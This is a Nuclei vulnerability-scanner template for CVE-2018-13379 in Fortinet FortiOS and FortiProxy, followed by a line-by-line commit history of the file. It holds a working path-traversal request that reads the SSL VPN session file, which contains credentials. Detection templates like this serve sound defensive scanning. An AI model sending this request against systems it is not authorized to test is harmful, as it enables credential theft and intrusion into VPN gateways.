nuclei-templates/cves/2018/CVE-2018-13379.yaml

id: CVE-2018-13379

info:
  name: FortiOS - Credentials Disclosure
  author: organiccrap
  severity: critical
  description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0
    to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
  reference:
    - https://fortiguard.com/advisory/FG-IR-18-384
    - https://www.fortiguard.com/psirt/FG-IR-20-233
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-13379
    cwe-id: CWE-22
  tags: cve,cve2018,fortios

requests:
  - method: GET
    path:
      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    matchers:
      - type: word
        words:
          - "var fgt_lang"
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-13379`
pending pull 2020-04-22 06:42:01 +00:00
			`info:`
Pushing newly added cves 2020-06-22 13:35:37 +00:00			`name: FortiOS - Credentials Disclosure`
pending pull 2020-04-22 06:42:01 +00:00			`author: organiccrap`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: critical`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0`
			`to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.`
			`reference:`
			`- https://fortiguard.com/advisory/FG-IR-18-384`
			`- https://www.fortiguard.com/psirt/FG-IR-20-233`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2018-13379`
			`cwe-id: CWE-22`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2018,fortios`
pending pull 2020-04-22 06:42:01 +00:00
			`requests:`
			`- method: GET`
Update syntax 2020-05-25 07:49:06 +00:00			`path:`
CVE-2018-13379 traversal path is corrected 2021-04-20 23:15:12 +00:00			`- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"`
pending pull 2020-04-22 06:42:01 +00:00			`matchers:`
			`- type: word`
Update syntax 2020-05-25 07:49:06 +00:00			`words:`
:pencil2: Update default path 2021-02-23 20:47:27 +00:00			`- "var fgt_lang"`